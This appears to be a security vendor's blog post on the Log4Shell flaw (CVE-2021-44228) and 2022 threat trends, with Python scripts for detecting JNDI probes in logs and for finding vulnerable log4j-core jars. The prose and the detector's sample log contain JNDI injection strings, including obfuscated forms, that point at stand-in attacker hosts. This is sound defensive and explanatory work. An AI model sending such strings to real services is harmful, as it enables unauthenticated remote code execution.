How the Log4j Flaw will Increase Cyber Threats in 2022

Our last post discussed some of the IT trends we expect to shape the industry and customer objectives in the coming year. Since security will be the number one priority, let’s take a deeper dive into what the cybersecurity landscape will look like in 2022.

The odds are high that 2022 will be worse than 2021, which saw huge increases in some forms of cybercrime. One factor will be the Log4j vulnerability (CVE-2021-44228, widely known as Log4Shell), which was reported to Apache in late November 2021 and publicly disclosed in December 2021. Log4j is an open-source logging library used in countless Java applications. It is designed to record all kinds of application events, including errors and messages from users. Security researchers discovered that Log4j evaluated "lookup" expressions embedded in the text it logged: an attacker who could get a string such as ${jndi:ldap://attacker-controlled-host/a} into any logged field (a username, a User-Agent header, a chat message) could make the server fetch a Java object from a remote LDAP or RMI server and execute it, with no authentication required.
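To make that mechanism concrete, here is an added example (not code from the original post): a small Python detector that finds Log4Shell probes in web-server access logs. It URL-decodes each line, collapses the nesting tricks attackers used to slip past simple string matching (${lower:j}, ${::-j}, ${env:NaN:-j}) the way Log4j's own lookup evaluation would, and then reports the scheme and host that a vulnerable server would have connected to. The log lines and the hostname evil.example are constructed for the demo; the lookup types modelled (lower, upper, and the ":-default" fallback) are the ones seen in real probes.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import unquote

# One innermost ${...} lookup, i.e. one whose body contains no further "${".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalisation: capture the scheme and the host it would
# contact. Log4j lower-cases the lookup prefix, so match case-insensitively.
JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/:\s}]+)", re.IGNORECASE)


def _evaluate(body: str) -> Optional[str]:
    """Evaluate one lookup body the way Log4j would for attacker-chosen input.

    Returns the substitution text, or None to leave the lookup in place (the
    jndi: lookup itself, or a lookup type this detector does not model).
    """
    low = body.lower()
    if low.startswith("jndi:"):
        return None
    # "${prefix:key:-default}": attackers pick keys that are never set
    # (${env:NaN:-j}, ${::-j}), so the default text is what Log4j substitutes.
    if ":-" in body:
        return body.split(":-", 1)[1]
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    return None


def normalize(text: str, max_rounds: int = 50) -> str:
    """Resolve nested lookups inside-out until only jndi:/unknown ones remain."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            out = _evaluate(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


@dataclass
class Finding:
    line_no: int
    scheme: str      # ldap, ldaps, rmi, dns, ...
    host: str        # where the victim JVM would connect
    normalized: str  # the log line with obfuscation collapsed


def scan(lines: Iterable[str]) -> List[Finding]:
    """URL-decode, de-obfuscate and flag every JNDI lookup in a log stream."""
    findings: List[Finding] = []
    for n, raw in enumerate(lines, 1):
        text = normalize(unquote(raw))
        for m in JNDI.finditer(text):
            findings.append(Finding(n, m.group(1).lower(), m.group(2), text))
    return findings


# Constructed access-log lines for the demo; the host evil.example is not real.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:42:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:42:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://evil.example:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:42:08 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:r}mi://evil.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:13:42:09 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi'
    '%3Aldap%3A%2F%2Fevil.example%2Fc%7D HTTP/1.1" 404 12 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: jndi via {f.scheme} to {f.host}")
```

Searching raw logs for the literal string "jndi:" would miss lines 3 and 4 of the sample; normalizing first is what makes them visible. The same de-obfuscation applies to any logged field, not only the User-Agent and query string shown here.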

Log4j has been compared to the 2014 Heartbleed and Shellshock vulnerabilities because of the extent of its impact. No one knows how many systems are vulnerable to the Log4j flaw: many applications pull the library in indirectly, as a dependency of other Java libraries and of commercial products, so it often does not appear in an organization’s own software inventory.

Here are four ways log4j could affect cybersecurity in the coming year:

1. Ransomware

According to estimates by one security firm, there were more than 700 million ransomware attacks in 2021, an increase of 130 percent over 2020. Although some experts expect the number of attacks to level off, ransom demands and recovery costs will likely rise as more attackers combine data exfiltration with encryption to force victims to pay. The Log4j flaw gives ransomware operators an unauthenticated, remotely exploitable entry point into internet-facing Java services. Because the exploit arrives as a logged string and the attacker’s class is loaded directly into the running JVM, file-based anti-malware often has nothing on disk to inspect until later stages of the intrusion.

2. Cryptojacking

Cryptojacking attacks rose in 2021 along with the cryptocurrency market, and within days of the Log4j disclosure attackers were exploiting it to plant cryptomining software on corporate systems. Cryptomining requires significant compute resources and electricity, and criminals steal these resources from unsuspecting victims. Traditionally, cryptojacking targeted consumers, but criminals now go after the more powerful PCs and servers in corporate environments. Cryptojacking drives up energy consumption, hogs network bandwidth, saps performance, and stresses hardware. Increasingly, the miner arrives bundled with other malware that establishes persistence and exfiltrates data.

3. Supply Chain Attacks

In a supply chain attack, attackers compromise a vendor’s software or services and use that trusted channel to reach the vendor’s customers. The SolarWinds and Kaseya attacks are high-profile examples: a weakness in one product let attackers push malicious code to thousands of downstream organizations. According to an analysis by the Identity Theft Resource Center, supply chain attacks increased 42 percent in the U.S. in the first quarter of 2021 alone. Log4j is a software supply chain problem of a different kind. The vulnerable library is embedded in a wide range of commercial and open-source products, so a single flaw exposes thousands of organizations that never installed Log4j themselves, and each of them must wait for every vendor in its stack to ship a fixed version.

4. Attacks on Cloud Resources

The growing adoption of cloud platforms has already led to a sharp rise in cloud threats, with IBM X-Force researchers reporting that cloud-related vulnerabilities grew 150 percent over the past five years; almost half of the roughly 2,500 known cloud vulnerabilities were disclosed in the past 18 months. The Log4j flaw will likely increase the exposure of cloud resources, as many Java applications are deployed in the cloud and cloud providers’ own services were among those affected. Organizations often fail to recognize their side of the shared responsibility model: the provider secures the platform, but the customer is responsible for patching the applications it deploys on it. Cloud misconfigurations and a failure to use the security tools providers already offer are leading causes of cloud security breaches.

How to Protect against Log4j Exploitation

According to the Apache Log4j Vulnerability Guidance from CISA, some of the immediate actions that your organization can take include:

• Discover all internet-facing assets that accept data inputs and use the Log4j Java library anywhere in the stack.

• Discover all assets that use the Log4j library, internal as well as internet-facing.

• Update or isolate affected assets. Assume compromise, identify common post-exploitation sources and activity, and hunt for signs of malicious activity.

• Monitor for unusual traffic patterns (e.g., outbound JNDI LDAP/RMI connections, DMZ systems initiating outbound connections). Application servers rarely have a legitimate reason to open outbound LDAP (389/636) or RMI (1099) connections to the internet, so such connections are a high-fidelity indicator of exploitation.
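The discovery and triage steps above are easier to act on with a script. The following is an added example, not part of CISA’s guidance or the original post: a Python scanner that walks a directory tree, opens every .jar/.war/.ear/.zip, recurses into archives nested inside archives (which is where log4j-core usually sits in a packaged web application), reads the version from the jar’s Maven pom.properties, and checks whether JndiLookup.class is still present. The demo() function builds a constructed sample tree of stand-in jars containing only those marker entries, so it runs offline. The fix thresholds (2.17.1, and 2.12.4 / 2.3.2 for the Java 7 / Java 6 branches) are Apache’s published fixed releases; the status labels are this example’s own.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, Iterator, List, NamedTuple, Optional, Tuple

# Marker entries in a log4j-core jar: the JNDI lookup class and the Maven metadata.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# Earliest release per branch with all four Dec 2021 fixes (CVE-2021-44228/-45046/-45105/-44832).
FIXED_FLOOR = {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}
DEFAULT_FLOOR = (2, 17, 1)


class Hit(NamedTuple):
    path: str                  # outer file; nested archives joined with "!/"
    version: Optional[str]
    jndi_lookup_present: bool


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(p) for p in m.groups() if p is not None) if m else None


def inspect_archive(zf: zipfile.ZipFile, label: str) -> Iterator[Hit]:
    """Yield a Hit if this archive is log4j-core, then recurse into nested archives."""
    names = set(zf.namelist())
    if JNDI_CLASS in names or POM_PROPS in names:
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        yield Hit(label, version, JNDI_CLASS in names)
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    yield from inspect_archive(inner, label + "!/" + name)
            except zipfile.BadZipFile:
                continue  # named like an archive but is not one


def scan_tree(root: str) -> List[Hit]:
    hits: List[Hit] = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fname)
                try:
                    with zipfile.ZipFile(path) as zf:
                        hits.extend(inspect_archive(zf, path))
                except zipfile.BadZipFile:
                    continue
    return hits


def assess(hit: Hit) -> str:
    """Deleting JndiLookup.class blocks the JNDI RCE only; the later DoS and
    JDBC-appender CVEs still require an updated jar."""
    v = parse_version(hit.version) if hit.version else None
    if v is None:
        return "unknown-version"
    if v >= FIXED_FLOOR.get(v[:2], DEFAULT_FLOOR):
        return "patched"
    if not hit.jndi_lookup_present:
        return "jndilookup-removed"
    # CVE-2021-44228 affects 2.0-beta9 .. 2.14.1, except the Java 7/6 backports
    # 2.12.2+ and 2.3.1+, which already disabled the lookup.
    backported = (2, 12, 2) <= v < (2, 13) or (2, 3, 1) <= v < (2, 4)
    return "rce-vulnerable" if v < (2, 15) and not backported else "update-required"


def _make_jar(version: Optional[str], with_jndi_class: bool) -> bytes:
    """Constructed stand-in for a log4j-core jar holding only the marker entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, "artifactId=log4j-core\nversion=%s\n" % version)
        if with_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def demo() -> Dict[str, str]:
    """Build a constructed sample tree in a temp dir; return {relative path: assessment}."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    war = io.BytesIO()  # a web app bundling a vulnerable log4j-core in WEB-INF/lib
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _make_jar("2.14.1", True))
    samples = {
        "app.war": war.getvalue(),
        "log4j-core-2.17.1.jar": _make_jar("2.17.1", True),
        "log4j-core-2.12.2.jar": _make_jar("2.12.2", True),
        "log4j-core-2.14.1-stripped.jar": _make_jar("2.14.1", False),
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return {os.path.relpath(h.path, root): assess(h) for h in scan_tree(root)}
```

Run scan_tree() against application and container-image roots, not just web roots, and treat anything reported as unknown-version or jndilookup-removed as still needing a human look. The scanner keys on the standard package path, so a shaded ("fat") jar that relocated Log4j’s packages, or a vendor product that ships Log4j inside a non-zip installer, will not be found this way; cross-check the results against vendor advisories.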

How Rahi Can Help

Version upgrades and patches close the immediate hole, but there’s no substitute for an iron-clad enterprise security program. Whether designing, deploying, or consulting on bolstering existing security systems, the Rahi team can help fill the gaps by working with your security team to chart the solution best suited to your use case.

Rahi’s experts use our ELEVATE methodology to help customers develop comprehensive security strategies. From assessment through planning, implementation, and long-term management, we’re here to help you identify risks and vulnerabilities and ensure that your mission-critical systems and data are protected.
